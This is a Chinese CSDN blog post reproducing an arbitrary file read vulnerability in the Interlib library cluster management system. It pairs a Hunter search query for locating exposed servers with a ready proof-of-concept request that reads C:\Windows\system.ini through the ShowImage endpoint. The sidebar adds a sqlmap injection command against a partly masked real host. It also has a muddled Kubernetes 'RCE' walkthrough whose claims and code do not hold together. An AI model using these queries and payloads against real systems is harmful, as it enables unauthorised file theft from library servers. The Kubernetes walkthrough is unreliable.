【漏洞复现】广州图创图书馆集群管理系统任意文件读取漏洞

已于 2024-01-17 09:29:17 修改
阅读量888 收藏 6
点赞数 13
文章标签: web安全
于 2024-01-17 09:26:21 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37113223/article/details/135641089
版权
【漏洞复现】 专栏收录该内容
146 篇文章 1 订阅

已下架不支持订阅

Nx01 产品简介

        广州图创计算机软件开发有限公司是集产品研发、应用集成、客户服务为一体的高新技术企业,主要目标是为图书馆行业用户提供高质量的应用软件系统设计、集成和维护服务。

Nx02 漏洞描述

        广州图创图书馆集群管理系统存在任意文件读取漏洞,攻击者可利用漏洞下载服务器的敏感信息,源码等。

Nx03 产品主页

hunter-query: web.body="/interlib/common/"

Nx04 漏洞复现

构造POC进行漏洞验证。

/interlib/report/ShowImage?localPath=C:\Windows\system.ini

Nx05 修复建议

建议联系软件厂商进行处理。

晚风不及你ღ
关注
  • 13
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录

已下架不支持订阅

漏洞广州图书馆集群管理系统认证绕过漏洞
晚风不及你
01-17 849
广州计算机软件开发有限公司是集产品研发、应用集成、客户服务为一体的高新技术企业,主要目标是为图书馆行业用户提供高质量的应用软件系统设计、集成和维护服务。
IInterlib区域图书馆集群管理系统-用户手册.docx
01-11
IInterlib区域图书馆集群管理系统-用户手册.docx
漏洞】云图书馆集群管理系统 uploadfile 存在任意文件上传漏洞
最新发布
https://blog.echo234.cn/
03-26 287
图书馆集成管理系统是一套基于aspx的图书馆系统,该系统存在文件上传漏洞,攻击者可获取服务器权限。
漏洞图书馆集群管理系统存在逻辑绕过
失心少年
10-12 615
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!广州计算机软件开发有限公司图书馆集群管理系统存在逻辑绕过,攻击者可通过此漏洞登录后台,从而造成不良影响。
专题资料(2021-2022年)IInterlib区域图书馆集群管理系统-用户手册.doc
10-07
专题资料
管理SQL注入漏洞
weixin_30667301的博客
06-14 846
payload root@kali:~# sqlmap -u http://2*0.*6.***.3:8080/opac/recommend/recommendBookList/list --data="page=1&rows=1&hasNextPage=false&searchType=title&searchValue=aaaaaaa" -p search...
漏洞广州 图书馆集群管理系统 WebBookNew SQL注入漏洞
qq_67810151的博客
03-13 377
由于广州 图书馆集群管理系统 WebBookNew 接口处未对用户输入的SQL语句进行过滤或验证导致出SQL注入漏洞,未经身份验证的攻击者可以利用此漏洞获取数据库敏感信息。
interlib系统服务器,Interlib图书馆集群管理系统.docx
weixin_39763683的博客
08-05 1522
Interlib图书馆集群管理系统Interlib图书馆集群管理系统发布时间:2009-12-08阅览次数:1294 Interlib图书馆集群管理系统是全新的第三代图书馆自动化系统。作为资源共建共享的新的实形式,Interlib图书馆集群管理系统(以下简称Interlib系统)实了传统业务管理与海量数字资源管理的结合。Interlib系统通过Interlib或城域网络将区域内各图书馆联合起来...
SCANV团队预警libsys图书馆系统注入漏洞
爱尖刀科技媒体 - 曲子龙
12-10 882
近日,SCANV团队监测到一个libsys图书馆系统的注入漏洞。该漏洞可使黑客获取到数据库信息,恶意篡改数据,甚至造成“拖库”等危害。SCANV团队预警站长关注此漏洞。 libsys是江苏汇文软件公司推出的一款基于B/S架构的图书馆自动化系统,主要服务于国内各大院校的图书馆,国内42%的“211工程大学”和诸多的“985工程大学”均采用了libsys图书馆管理系统。 SCANV
Interlib图书馆集群管理系统.docx
06-18
Interlib图书馆集群管理系统
Facebook Twine集群管理系统
03-09
Facebook Twine集群管理系统 Facebook Twine集群管理系统是Facebook开发的一种统一的集群管理系统,旨在管理共享基础设施中的机器和服务。该系统的设计目标是提供一种高效、灵活、可扩展的集群管理解决方案,以满足...
Interlib系统用户手册
08-08
Interlib系统用户手册,所有的系统模块操作步骤和方法,有截
INTERLIB图书馆集群自动化业务管理系统简明培训教程.doc
06-20
INTERLIB图书馆集群自动化业务管理系统简明培训教程
interlib区域图书馆集群管理系统用户手册.doc
06-30
interlib区域图书馆集群管理系统用户手册
广州-图书馆集群管理系统-webbooknew-sql注入
weixin_43567873的博客
03-04 151
广州图书馆集群管理系统 webbooknew 接口存在SQL注入漏洞
广州 图书馆集群管理系统 WebBookNew SQL注入漏洞
0xSec
03-04 564
由于广州 图书馆集群管理系统 WebBookNew 接口处未对用户输入的SQL语句进行过滤或验证导致出SQL注入漏洞,未经身份验证的攻击者可以利用此漏洞获取数据库敏感信息。
interlib系统服务器,Interlib图书馆集群管理系统
weixin_31764625的博客
08-06 3359
Interlib图书馆集群自动化管理系统是新一代的文献信息管理软件,采用B/S模式,开放的多层结构体系,基于Internet实传统业务管理与海量数字资源管理的结合。Interlib作为资源共建共享的新的实形式,通过Internet网络、校园网、城域网将图书馆联合起来,组成一个区域性的虚拟图书馆群,建立一个区域图书馆群的电子化、数字化、网络化的立体信息空间,同时通过开放的多层结构达到与国内外其它...
管理系统(有很多漏洞)怎么改最好
mhx531的专栏
07-14 970
<br />/*题目:简单管理系统<br />要求:<br />综合运用C语言的基本知识和程序设计方法,开发一个简单的管理系统。<br />具体功能要求如下:<br />1. 管理:增加书、修改书、删除书、统计书;<br />2. 借阅管理:查找书、借阅书、归还书、借阅书统计;<br />3. 读者管理:申请读者卡、删除读者卡、修改读者卡;<br />4. 馆员管理:添加管理员、修改管理员信息、删除管理员。<br />根据以上功能说明,设计馆员信息、读者信息、读者卡信息、书信息
cnnvd漏洞
05-26
漏洞是指通过模拟攻击者的行为,验证一个漏洞是否存在、是否可利用。下面以CNNVD-202104-1274漏洞为例,介绍一下漏洞的步骤: 1. 漏洞介绍 CNNVD-202104-1274漏洞是指华为云容器引擎CCE(Cloud Container Engine)在使用kubernetes管理容器时存在的一种远程代码执行漏洞。攻击者可以通过构造恶意请求,执行任意命令。 2. 环境准备 为了进行漏洞,需要安装以下工具: - kubectl:kubernetes的命令行工具,用于管理kubernetes集群。 - minikube:用于本地测试kubernetes应用程序的工具。 3. 步骤 3.1 部署CCE 首先,需要在minikube中部署CCE,具体步骤可以参考华为云官方文档。 3.2 构造恶意请求 攻击者可以通过构造恶意pod模板,触发漏洞。 ``` apiVersion: v1 kind: Pod metadata: name: test spec: containers: - name: test image: nginx command: ["/bin/sh","-c"] args: ["echo `whoami`;id"] volumeMounts: - name: test mountPath: /var/run/secrets/kubernetes.io/serviceaccount readOnly: true volumes: - name: test hostPath: path: /var/run/secrets/kubernetes.io/serviceaccount ``` 在这个模板中,攻击者通过在command字段中加入命令,达到远程执行命令的目的。 3.3 发起攻击 使用kubectl命令建恶意pod: ``` kubectl apply -f pod.yaml ``` 当pod启动后,攻击者可以通过访问pod的日志,获取到执行命令的结果: ``` kubectl logs test ``` 4. 漏洞 华为云已经发布了漏洞的升级包,建议及时进行升级。 以上就是CNNVD-202104-1274漏洞漏洞步骤。需要注意的是,漏洞时需要遵循法律法规,不得进行非法攻击行为。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值